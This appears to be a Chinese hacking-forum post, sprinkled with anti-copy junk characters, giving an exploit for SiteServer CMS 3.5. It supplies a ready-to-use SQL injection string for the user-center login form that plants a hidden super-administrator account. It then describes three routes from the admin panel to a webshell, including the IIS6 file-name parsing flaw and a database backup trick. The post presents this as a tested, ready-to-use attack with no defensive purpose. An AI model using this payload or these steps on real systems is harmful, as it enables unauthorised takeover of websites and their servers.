经测试秒杀最新的3.5版8 j5 \6 s8 H. p
stieserver官网:www.siteserver.cn
- Z! ~: G( M' Z C5 h( [EXP:; n% n" a3 l: P( o9 Y' G
直接访问UserCenter/login.aspx2 J0 M& G& q; H6 ?* M8 B; {
用户名处输入: R6 ~5 {- L% C( z0 B) ^
9 e6 I% R& a5 c
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
3 C4 d8 Q: R/ |$ f密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。& ] Z; f5 s& y) N( r; p
之后再访问后台SiteServer/login.aspx用插入的用户登陆% }$ y0 N! N# i: A6 I% h% c" J0 \
后台拿webshell的三种方法:7 @/ F' y. ~3 ~, b: _1 f
一、
% v' R/ G8 X/ P站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx/ |3 @; W0 P9 f: O+ ^
二、
" K" C) E, j+ Q1 n. X% d0 u7 q成员权限-》添加用户-》用户名为:1.asp
$ \# S4 o* H/ Xhttp://127.0.0.1/usercenter/
0 ?8 A+ F5 Q/ `1 v4 p6 _! d. j用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
/ m& W" ^0 ^' I5 M(ps:后台添加用户时不会验证是否含有非法字符)
9 _0 U- X* `7 Z d w% n三、" t! B1 d* A( @% L% {% b8 i. h
系统工具-》实用工具-》机器参数查看
8 s$ o+ [" z8 l* S# { I可以看到数据库类型、名称,WEB路径
3 ?) i! f' C4 C0 p8 c9 J系统工具-》数据库工具-》SQL语句查询, a0 z1 R j1 O3 |4 A, G
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |